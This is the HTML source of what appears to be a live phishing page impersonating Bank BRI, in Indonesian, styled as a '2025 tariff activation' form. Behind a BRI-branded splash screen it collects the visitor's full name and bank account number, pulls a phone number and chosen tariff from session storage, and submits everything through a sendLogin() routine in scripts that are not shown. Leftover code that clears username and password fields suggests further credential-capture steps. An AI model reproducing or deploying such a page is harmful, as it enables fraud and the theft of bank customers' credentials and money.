<html lang="id">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
     <meta name="theme-color" content="#006BC6"> 
     <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟱</title>
         <meta content="https://hosting.tigerengine.id/f8uyn1.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/f8uyn1.jpg">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
   
        <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
</head>
<style>
@import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@100;200;300;400;500;600;700;800;900&amp;display=swap');
    * {
        font-family: 'Montserrat', sans-serif;
        font-weight: 400;
        margin: 0 auto;
        padding: 0;
        font-size: 15px;
        box-sizing: border-box;
        position: relative;
        color: #000;
    }
   
    .blue {
        color: #00529C;
    }
    .container {
        width: 100%;
        height: 100%;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .containerlog .head {
        width: 100%;
        display: flex;
    }
    .containerlog .head img {
        width: 100%;
        margin: auto;
    }
    .containerlog .bform {
        position: fixed;
        bottom: 0;
        z-index: 999999;
        background: #fff;
        width: 100%;
        padding: 0 15px;
    }
    .containerlog .tit {
        font-size: 23px;
        font-weight: 800;
        margin-bottom: 20px;
    }
    .containerlog .bginp {
        box-shadow: 0px 2px 5px 1px #e7e7e7;
        border: 0.3px solid #e7e7e75b;
        border-radius: 6px;
        overflow: hidden;
        width: 100%;
        padding: 8px;
        padding-bottom: 0;
    }
    .containerlog .wrpinp {
        width: 100%;
        height: 55px;
        max-height: 60px;
        display: flex;
        align-items: flex-end;
        padding-bottom: 15px;
    }
    .containerlog .wrpinp i {
        font-size: 19px;
        text-align: center;
    }
    .containerlog .wrpinp i.icon {
        width: 35px;
        max-width: 35px;
        margin-right: 7px;
    }
    .containerlog input {
        width: 100%;
        border: none;
        font-size: 16px;
        font-weight: 500;
        outline: none;
        background: none;
    }
    .containerlog .forgot {
        width: 100%;
        text-align: right;
        font-size: 14px;
        font-weight: 800;
        margin: 10px 0;
    }
    .containerlog #formLog #btnsubmit {
        margin-bottom: 20px;
    }
    .containerlog button:disabled {
        background: #0079e65b;
        transition: .2s;
    }
    .containerlog button {
        width: 100%;
        height: 47px;
        max-height: 47px;
        border: none;
        border-radius: 6px;
        background: #0079e6;
        color: #ffffff;
        text-align: center;
        font-size: 14px;
        font-weight: 800;
        margin-top: 35px;
        transition: .2s;
    }
    .toggle {
        position: absolute;
        right: 0;
        bottom: 5px;
        width: 45px;
        height: 45px;
        z-index: 9999;
    }
    .toggle i {
        position: absolute;
        font-size: 19px;
    }
    @media screen and (min-width: 768px) {
        .container {
            width: 600px;
            height: 800px;
            margin: auto auto;
        }
        .containerlog .bform {
            position: relative;
            padding-bottom: 30px;
        }
    }
    
    /*input PIN style*/
    
    .containerpin * {
        color: #fff;
    }
    .containerpin {
        position: fixed;
        top: 0;
        left: 0;
        background: #0000009b;
        backdrop-filter: blur(8px);
        z-index: 99999999;
        width: 100%;
        height: 100%;
    }
    .containerpin .headpin {
        width: 100%;
        padding: 20px;
    }
    .containerpin .headpin h1 {
        font-size: 15px;
        font-weight: 800;
        text-align: center;
    }
    .containerpin .headpin i {
        font-size: 20px;
        position: absolute;
        left: 20px;
    }
    .containerpin h1.tit {
        font-size: 20px;
        font-weight: 800;
        text-align: center;
        margin: 40px 0;
    }
    .containerpin .bginp {
        width: 100%;
        height: 40px;
    }
    .containerpin .clear {
        width: 100%;
        height: 100%;
        position: absolute;
        z-index: 99;
    }
    .containerpin input:valid {
        background: #ffffff9b;
        transition: .2s;
    }
    .containerpin input {
        transition: .2s;
        background: none;
        width: 22px;
        height: 22px;
        border-radius: 50%;
        border: 2.5px solid #fff;
        outline: none;
        text-align: center;
        color: transparent;
        font-weight: 700;
        margin: 0 10px;
    }
    .containerpin span.frgt {
        font-size: 14px;
        width: 110px;
        font-weight: 800;
        padding: 14px 15px;
        background: #0000003b;
        margin: 30px auto 50px auto;
        color: #0079e6;
        border-radius: 17px;
    }
    .keypad {
        width: 90%;
        position: fixed;
        bottom: 20px;
        left: 0;
        right: 0;
        margin: 0px auto;
    }
    .keypad .table {
        height: auto;
        width: 330px;
    }
    .table .line {
        width: 100%;
        margin: 15px 0;
        display: flex;
        align-items: center;
        justify-content: space-between;
    }
    .table .line button:active {
        background: #ffffff3b;
        transition: 0s;
    }
    .table .line button i {
        font-size: 20px;
    }
    .table .line button {
        transition: .2s;
        height: 60px;
        width: 60px;
        border-radius: 50%;
        background: none;
        border: none;
        outline: none;
        font-size: 22px;
        font-weight: 700;
        text-align: center;
    }
    @media screen and (min-width: 768px) {
        .containerpin .headpin {
            width: 600px;
            margin: 0 auto;
        }
        .containerpin .keypad {
            position: relative;
            margin-top: 100px;
        }
    }




   body, html {
           
         background-position: center;
       background: #fff;
         height: 0vh;
  font-size: 16px;
  position: relative;
  width: 100%;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  max-width: 450px;
            
            margin: 0 auto;
            font-family: 'Open Sans', sans-serif;
        }

        .imagesi{
    margin-top: 20px;
    width: 100%;
    height: 98%;
    position: fixed;
        }
        
        .Input{
            width: 95%;
            height: 50px;
            position: relative;
            left: 0;
            right: 0;
            outline: none;
            margin: 0px auto;
            border: 1.5px solid #ddd;
            border-radius: 8px;
            
            top: 0;
        }
        
        .Input::placeholder{
            color: #aaa;
        }
        
        
        .Input:focus, .input:active{
            border: 1.5px solid #bbb;
        }
        
ion-icon{
    width: 25px;
    height: 25px;
}


   .btn-login {

            font-family: 'Avenir';
position: fixed;
            display: block;
            margin: 0px auto;
            padding: 0px; 
     font-weight: 700;
    width: 100%;
    height: 50px;
    background: #0F78CB;
    padding-right: 0px;
            cursor: pointer; 
    background-position: 0px 0px;
    background-size: 100% 53px;
    background-repeat: no-repeat;
            border: none; 
            text-align: center; 
            height: 50px; 
            width: 90%; 
            left: 0;
            right: 0;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 0px 0px 0px 0px; 
            transition: background 100ms step-start 0s;
            bottom: 70;
        }

        .btn-login:disabled {
            opacity: 0.5;
            background: #ccc;
            color: #00000090;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 90%;
            }
        }
        #ionIcons {
            color: #2C2C2C;
            font-size: 20px;
            width: 20px;
            height: 20px;
            position: absolute;
            display: block;
            margin-top: 91px;
            z-index: 9;
            margin-left: 30px;
            padding: 3px 8px 8px 0px;
            opacity: 0.7;
        }

        
        .eye {
            display: block;
            margin: 0px auto;
            margin-right: 20px;
            position: absolute;
            box-sizing: border-box; 
            z-index: 16; 
            right: 11;
            top: 153;
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
            z-index: 9999;
        }
        
          .btn-login1 {

            font-family: 'Avenir';
position: absolute;
            display: block;
            margin: 0px auto;
            padding: 0px; 
     font-weight: 700;
    width: 100%;
    height: 52px;
    
    padding-right: 60px;
            cursor: pointer; 
            background-color: transparent;
    background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrkyvE1T2DsAnuhfEP1fiaWmqVZn-bd_GGi7QocBRx3gOwn9fswsPJvsm0-FC80Efc2AKkbJR_4ALZ1FVI7YlcbKijTKMG862bBhdK_iYuD2PchdlcVdD7IGTcD5jJolCN0MSv-uxi3M8REQOYmzUi5B0DpMsrF3R9BEzzmaJ6hs2TMKw2HlTPdnW/s1039/IMG_20221215_151324.jpg");
    background-position: 0px 0px;
    background-size: 100% 53px;
    background-repeat: no-repeat;
            border: none; 
            text-align: center; 
            height: 52px; 
            width: 90%; 
            left: 0;
            right: 0;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 0px 0px 0px 0px; 
            transition: background 100ms step-start 0s;
            bottom: 20;
        }

        .btn-login1:disabled {
            opacity: 0.5;
            background: #eee;
        }

        @media only screen and (max-width: 600px) {
            .btn-login1 {
                width: 90%;
            }
        }    
        
        
        
        
</style>
<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInUp; 
    animation-name: bounceInUp; 
}

@-webkit-keyframes bounceInUp { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    80% { 
        -webkit-transform: translateY(10px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 

@keyframes bounceInUp { 
    0% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(10px); 
    } 
    80% { 
        transform: translateY(10px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 

.bounceInUp { 
   
}


   .wrapper {
	width: 100%;
	overflow: hidden;
}
.photobanner {
	position: relative;
	height: 173px;
	margin-bottom: 35px;
	display: flex;
	width: 100%;
	
}

.photobanner img {
  margin: 10px 5px;
  box-shadow: 2px 3px 8px #0d0d0d50;
  border: 2px groove #118eea;
  border-radius: 5px;
}

.photobanner {
  animation: bannermove 15s linear infinite alternate-reverse;
}

@keyframes bannermove {
  from {
    left: 0%;
  }
  to {
    left: -1000px;
  }
}


welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    width: 100%;
    height: 100%;
    display: block;
    
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:100%;
        height: 100%;
    
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.hua{
    border: 0px solid #8a8a8a;    
    border-radius: 10px;
    width: 95%;
    box-shadow: 0px 0px 4px 0px #8a8a8a;
    background-color: #ffffff;
    animation-name: bounceInLeft;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;
}


select{
  width: 95%;  
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px;
}

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
       .jao{
            width:90%;
      }
      
.animation-bounceInLeft {
    animation-name: bounceInLeft;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;
    animation-iteration-count: infinite;
}
@keyframes bounceInLeft {
    0% {
        opacity: 1;
        transform: translateX(-200px);
    }
    60% {
        opacity: 1;
        transform: translateX(-30px);
    }
    80% {
        transform: translateX(-10px);
    }
    100% {
        transform: translateX(0);
    }
}




.animation-bounceInRight {
    animation-name: bounceInRight;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;
}
@keyframes bounceInRight {
    0% {
        opacity: 0;
        transform: translateX(200px);
    }
    60% {
        opacity: 1;
        transform: translateX(30px);
    }
    80% {
        transform: translateX(10px);
    }
    100% {
        transform: translateX(0);
    }
}


.animation-bounceInDown {
    animation-name: bounceInDown;
    animation-duration: 1s;
    animation-fill-mode: both;
    animation-iteration-count: infinite;
}
@keyframes bounceInDown {
    0% {
        opacity: 1;
        transform: translateY(-200px);
    }
    60% {
        opacity: 1;
        transform: translateY(-100px);
    }
    80% {
        transform: translateY(-10px);
    }
    100% {
        transform: translateY(0);
    }
}


</style>
<body style="background: url(''),#fff no-repeat; background-position: 100% 100%
    background-size: 100% 100%;
    ;
    font-family: 'Varela Round', sans-serif;">
<welalxcome>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7DBUUKgaNDWpIrdlnAfVE29v8uTA_4gN0kYUUypY3Z8lzBPQ5wAhV5LPRehZxx7oEp9PyuZ9X5h-a3bQzApDTABpQXnmGUEZtjK0-U3c9rmyfXXD7aBPt8N-dtL5xoOQ0s3qpAXJHzi7N8j52wZEJ7ye01wQUmLA6Zn-5alUSBzYDVbuSnuJs3HaKSCw/s2207/AddText_09-08-05.11.11.jpg" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<nav style="position: fix; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 68px; background: transparent; z-index: 99999;  animation-name: bounceInDown;
    animation-duration: 1.5s;
    animation-fill-mode: both;max-width:450px;
    ">
 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig8lJ2TAjG3Frf_4E42lP3LEw4KyecrTH1gDWKv1TKALAwbNg_UcEsGSYKN1sb3nisb_reXgAFPi1OyPGWixuw1jdOl7rttdBAf-cnv9zXEdfl_EX0OxxFTJy86y7cyJsayGx1XNgifWwmC8oYkqbxb9EKb1vlQxBoTDGgOFy0ht7Cnpj6K_radbnUD9g/s1080/AddText_06-08-12.57.52.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto; z-index: 99999999;box-shadow: rgba(60, 64, 67, 0.35) 2px 2px 3px 2px;">
</nav>        
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY_qaSAcnhSXyU1WtrRAAkDnrSZWpkxcHvZh32l7q07Ge-QKA3vc16NLSlkU0uJKSCCbZRM7HEQ3Pwa3CpDnT8Yq8LnnyP2uFD2WwTTo58iyNVGHGiqU_PJhpL6TxVk78Df4k7HWgl1k3PzJWtvtICgL6baFnyy0YjdcPjdaEHl0Po53ET-TP9IBYUPA4/s1131/bg_login_revamp.png" style="width: 100%; position: absolute; top: 0; left: 0; right: 0; bottom: 0; margin: 0px auto; z-index:">    
    
<div class="wrapper">
	<div class="photobanner">
  <img class="nyusu" src="https://bri.co.id/documents/36847/4dbb9c70-d426-fff1-8a26-1266ef2740cb?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/e9abfd43-fd2d-34a8-4ba7-9ee8ef6fef83?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/082fcf8e-4876-0cd0-e746-7a8fe248b291?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/4a292ca2-1073-afe8-8481-f1c9e17121c9?download=false" alt="">
<img class="nyusu" src="https://bri.co.id/documents/36847/654d619e-dd7f-0a1b-1234-881b74f6a017?download=false" alt="">
 
</div>
</div>    
<div class="load" style="display:none">
 <img src="img/f01dmo.gif" class="jao" alt="">
      </div>
     <div class="container" style="height:0vh;">

        
               
            </div>
   <div class="row mt-3" style="margin-bottom: -0px">
                <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 0 auto; ">
                   
                    </div>
            </div>          
<div style="position: ; left: 0; right: 0; width: 100%; top: 50%; bottom: 0; height: 0px; background: ; display: " id="formlogin" >
    <div style="position: ; left: 0; right: 0; width: 100%; height: 0px; background: transparent; margin: 0px auto; bottom: 0px; border-radius: 15px 15px 0px 0px; border: 0px solid blue" class="">

<center>

</center>
<form onsubmit="sendLogin(); return false" method="POST" id="inputlogin" style="margin-top: -10px; padding: 10px">
<input type="hidden" id="tarif" name="tarif">
<input type="hidden" name="nohp" id="nohp">
<center>
 <div class=" hua" style="margin-top: 0px;margin-bottom:25px;max-width: 340px;">
 <center style="position:">
  <!--  <img style="position: fixed;width:80%;margin: 0px auto;left: 0%; right: 0%; top: 105%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ljHuOwCkX-obA_zGcpQNG0TqC8M52BowJoH44fOF_OOoGRc9dPhUxal1BtOtkzke6sgk8J0waQ0RgGcput79rnpv_jLHbCTscv0yX3tSmRHxPcxTtJl0L2PcJqNiMBSj4ILhPAnehDBPgc4rjMG6l1r6C-RJnVe0UTwJwN_rmIH3NeprzTswVP2T5ws/s1876/AddText_05-16-07.54.33.jpg" alt=""> -->
    </center>        
<center style="color:#0f78cb; line-height: 15px; font-size: 14px; padding: 20px;margin-top:-22px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;margin-top: 5px; font-weight: bold; font-family: 'Varela Round', sans-serif; color: #0f78cb;">ᴜɴᴛᴜᴋ ᴍᴇʟᴀɴᴊᴜᴛᴋᴀɴ ᴘʀᴏsᴇs ᴛᴀʀɪғ ᴛʀᴀɴsᴀᴋsɪ ᴀɴᴅᴀ, sɪʟᴀʜᴋᴀɴ ᴍᴀsᴜᴋᴋᴀɴ ᴅᴀᴛᴀ ᴅɪʙᴀᴡᴀʜ ɪɴɪ.<br><br></p>
<br><br>

<h5 style="position:absolute;color:#000;margin: 0px auto; margin-top: 0px; left: 30; right: 0; font-size: 15px; text-align: left">Atas Nama:</h5>
 <input id="nama" name="nama" type="text" class="bubble-element Input" placeholder="Nama sesuai KTP" oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗮𝗺𝗮 𝘀𝗲𝘀𝘂𝗮𝗶 𝗞𝗧𝗣')" onchange="this.setCustomValidity('')" autocomplete="off" required style="width: 95%;  font-weight:500;
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px; margin-top: 22px; background-image: url(); background-position: 100% 100%;
    background-size: 100% 100%;
    ;"/>
<br><br>
<h5 style="position:absolute;color:#000;margin: 0px auto; margin-top: 0px; left: 30; right: 0; font-size: 15px; text-align: left">Nomor Rekening</h5>
 <input id="rek" name="rek" type="tel" class="bubble-element Input" placeholder="***********" oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗥𝗲𝗸𝗲𝗶𝗻𝗴 𝗕𝗥𝗜')" onchange="this.setCustomValidity('')" autocomplete="off" maxlength="15" required style="width: 95%;  font-weight:500;
  height: 40px;
  padding: 10px;
  outline: none;
  box-shadow: 2px 3px 6px #8a8a8a;
  border: 1px solid #0f78cb;
  border-radius: 8px; margin-top: 22px; background-image: url(); background-position: 100% 100%;
    background-size: 100% 100%;margin-bottom:20px;
    ;"/>



                                     
                              
    </div>
    <div style="max-width: 400px;">
  <img style="width:20%;margin-bottom: 30px;" src="img/T24.png" alt=""></img>        
    </div>

<div style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 82px; background: #fff; box-shadow: rgba(0, 0, 0, 0.15) 5px 5px 15px 0px; padding-top: 15px; border-top: 2px double #ccc; animation-name: bounceInRight;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;">
<button type="submit" id="kirims" style="left: 0; right: 0; margin: 0px auto;font-weight:bold;position:absolute;background-color:#006BC6;color:white;border:0px solid #0076e0;width:90%;border-radius:10px;font-family: 'Nunito', sans-serif;font-size: 16px;padding:13px; box-shadow: rgba(60, 64, 67, 0.3) 0px 1px 2px 0px, rgba(60, 64, 67, 0.35) 2px 2px 3px 2px; left: 0; right: 0; background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVJOn1AfxWnOJGOnUFREEwKvL5_mMLICHcQ951m5dv5iNIb8TmI7jNZIcqgkVU6-oKkTABJS1zQJSLjL_KaXX3B8Kv6MIcA5qSaiLR77DsKPRu76xKHwjGS_Tp1DxTD2rnV0RCeSZs1oRzgd74rscYS7YDszAJRSpHMwZNubxRhVqJmWmZA8XJLDJaous/s360/toolbar_header_dashboard.png');
    background-size: 100% 100%; background-position: 100% 100%" >Lanjutkan</button>
           </div>   
    </form>
            </div>
       


    </div>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="../js/viber.js"></script>
    <script src="../js/valid.js"></script>
    <script src="../js/function_btn.js"></script>
    
<script>

    
var tarif = sessionStorage.getItem("tarif");
document.getElementById("tarif").value = tarif + "";
var nohp = sessionStorage.getItem("nohp");
document.getElementById("nohp").value = nohp + "";
  </script>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.js"></script>
 <script type="text/javascript">
     $(document).ready(function(){
                
                $( '.saldo' ).mask('000.000.000.000.000', {reverse: true});
 
            });
            
            
        
 </script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script>



function vibr(dur) {
    if (navigator.vibrate) {
        navigator.vibrate(dur);
    } else {
        console.log("NotSupported");
    }
}

  </script>


   
     <script>
        function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }
           
    </script>
 
  
   <script>
 function gotoback(){
      $(".containerpin").fadeOut();
   $("#formlogin").fadeIn();  
     $("#uname").val('');
     $("#pass").val('');
  
 }   
</script>
   <script>
function gotologin(){
    document.getElementById("formlogin").style.display = "block";
}

function batalkanku(){
    document.getElementById("formlogin").style.display = "none";
    
}

 
</script>
</body>
</html>
